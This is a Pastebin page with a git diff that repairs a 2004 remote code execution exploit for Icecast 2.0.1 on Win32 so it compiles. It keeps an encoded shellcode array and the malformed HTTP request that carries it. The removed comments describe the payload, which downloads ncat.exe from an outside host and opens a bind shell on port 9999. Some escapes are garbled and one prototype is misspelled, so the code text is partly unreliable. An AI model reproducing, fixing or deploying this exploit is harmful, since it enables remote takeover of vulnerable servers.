API tools faq
paste
Advertisement
Guest User

fixedup

a guest
May 30th, 2021
220
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.91 KB | None | 0 0
raw download clone embed print report
  1. diff --git a/568 b/568.c
  2. index f48249e..57d94bf 100644
  3. --- a/568
  4. +++ b/568.c
  5. @@ -1,40 +1,3 @@
  6. -/*
  7. -
  8. -by Luigi Auriemma
  9. -
  10. -Shellcode add-on by Delikon
  11. -www.Delikon.de
  12. -
  13. -Because of all the forbidden bytes in a http get request
  14. -i had to use a very small shellcode, which was blown up
  15. -by Msf::Encoder::PexAlphaNum. Great encoder.
  16. --------------------------------------------------------------------------
  17. -C:>iceexec 127.0.0.1
  18. -
  19. -Icecast <= 2.0.1 Win32 remote code execution 0.1
  20. -by Luigi Auriemma
  21. -e-mail: [email protected]
  22. -web:http://aluigi.altervista.org
  23. -
  24. -shellcode add-on by Delikon
  25. -www.delikon.de
  26. -
  27. -- target 127.0.0.1:8000
  28. -- send malformed data
  29. -
  30. -Server IS vulnerable!!!
  31. -
  32. -
  33. -C:>nc 127.0.0.1 9999
  34. -Microsoft Windows XP [Version 5.1.2600]
  35. -(C) Copyright 1985-2001 Microsoft Corp.
  36. -
  37. -C:Icecast2 Win32>
  38. ----------------------------------------------------------------------------
  39. -
  40. -
  41. -*/
  42. -
  43. #include <stdio.h>
  44. #include <stdlib.h>
  45. #include <string.h>
  46. @@ -52,21 +15,20 @@ C:Icecast2 Win32>
  47. #include <arpa/inet.h>
  48. #include <netdb.h>
  49. #include <netinet/in.h>
  50. + #include <sys/time.h>
  51. #endif
  52.  
  53. #define VER "0.1"
  54. #define PORT 8000
  55. -#define BUFFSZ2048
  56. +#define BUFFSZ 2048
  57. #define TIMEOUT 3
  58. -#define EXEC"GET / HTTP/1.0rn"
  59. - "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn"
  60. - "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn"
  61. - "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn"
  62. - "arn" "arn" "arn" "arn" "arn" "arn" "arn"
  63. - "xcc"
  64. -//web download and execution shellcode
  65. -//which downloads http://www.elitehaven.net/ncat.exe
  66. -//this ncat spwans a shell on port 9999
  67. +#define EXEC "GET / HTTP/1.0rn"\
  68. + "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn"\
  69. + "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn"\
  70. + "arn" "arn" "arn" "arn" "arn" "arn" "arn" "arn"\
  71. + "arn" "arn" "arn" "arn" "arn" "arn" "arn"\
  72. + "xcc"
  73. +
  74. char shellcode[] = "xEB"
  75. "x03x59xEBx05xE8xF8xFFxFFxFFx4Fx49x49x49x49x49x49x51x5Ax56x54"
  76. "x58x36x33x30x56x58x34x41x30x42x36x48x48x30x42x33x30x42x43x56"
  77. @@ -99,34 +61,25 @@ char shellcode[] = "xEB"
  78. "x32x50x46x45x36x46x47x4Fx42x50x46x43x36x41x56x46x37x50x32x45"
  79. "x36x4Ax37x45x46x42x50x5A";
  80.  
  81. -
  82. -/*
  83. -in my example 0xcc is used to interrupt the code execution, you must
  84. -put your shellcode exactly there.
  85. -You don't need to call a shellcode offset (CALL ESP, JMP ESP and so
  86. -on) or doing any other annoying operation because the code flow
  87. -points directly there!!!
  88. -Cool and easy 8-)
  89. -*/
  90. -
  91. -
  92. +#ifdef WIN32
  93. int startWinsock(void)
  94. {
  95. WSADATA wsa;
  96. return WSAStartup(MAKEWORD(2,0),&wsa);
  97. }
  98. +#endif
  99.  
  100. -int timeout(int sock);
  101. -u_long resolv(char *host);
  102. +int ti1meout(int sock);
  103. +__u_long resolv(char *host);
  104. void std_err(void);
  105.  
  106. int main(int argc, char *argv[]) {
  107. - structsockaddr_in peer;
  108. + struct sockaddr_in peer;
  109. int sd;
  110. - u_short port = PORT;
  111. - u_charbuff[BUFFSZ];
  112. -UCHAR buf[4096];
  113. -UCHAR *pointer=NULL;
  114. + __u_short port = PORT;
  115. + __u_char buff[BUFFSZ];
  116. + char buf[4096];
  117. + char *pointer=NULL;
  118.  
  119.  
  120. setbuf(stdout, NULL);
  121. @@ -150,7 +103,6 @@ UCHAR *pointer=NULL;
  122. }
  123.  
  124. #ifdef WIN32
  125. -
  126. startWinsock();
  127. #endif
  128.  
  129. @@ -163,12 +115,12 @@ UCHAR *pointer=NULL;
  130. memset(buf,0x00,sizeof(buf));
  131. strcpy(buf,EXEC);
  132.  
  133. -pointer =strrchr(buf,0xcc);
  134. + pointer =strrchr(buf,0xcc);
  135.  
  136. -strcpy(pointer,shellcode);
  137. + strcpy(pointer,shellcode);
  138.  
  139. -strcat(buf,"rn");
  140. -strcat(buf,"rn");
  141. + strcat(buf,"rn");
  142. + strcat(buf,"rn");
  143.  
  144.  
  145. printf("n- target %s:%hun",
  146. @@ -195,12 +147,12 @@ strcat(buf,"rn");
  147. }
  148.  
  149. int timeout(int sock) {
  150. - structtimeval tout;
  151. - fd_setfd_read;
  152. + struct timeval tout;
  153. + fd_set fd_read;
  154. int err;
  155.  
  156. - tout.tv_sec = TIMEOUT;
  157. - tout.tv_usec = 0;
  158. + tout.tv_sec = TIMEOUT;
  159. + tout.tv_usec = 0;
  160. FD_ZERO(&fd_read);
  161. FD_SET(sock, &fd_read);
  162. err = select(sock + 1, &fd_read, NULL, NULL, &tout);
  163. @@ -209,9 +161,9 @@ int timeout(int sock) {
  164. return(0);
  165. }
  166.  
  167. -u_long resolv(char *host) {
  168. - structhostent *hp;
  169. - u_longhost_ip;
  170. +__u_long resolv(char *host) {
  171. + struct hostent *hp;
  172. + __u_long host_ip;
  173.  
  174. host_ip = inet_addr(host);
  175. if(host_ip == INADDR_NONE) {
  176. @@ -219,7 +171,7 @@ u_long resolv(char *host) {
  177. if(!hp) {
  178. printf("nError: Unable to resolve hostname (%s)n", host);
  179. exit(1);
  180. - } else host_ip = *(u_long *)(hp->h_addr);
  181. + } else host_ip = *(__u_long *)(hp->h_addr_list[0]);
  182. }
  183. return(host_ip);
  184. }
  185. @@ -231,4 +183,4 @@ u_long resolv(char *host) {
  186. }
  187. #endif
  188.  
  189. -// milw0rm.com [2004-10-06]
  190. \ No newline at end of file
  191. +// milw0rm.com [2004-10-06]
  192.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!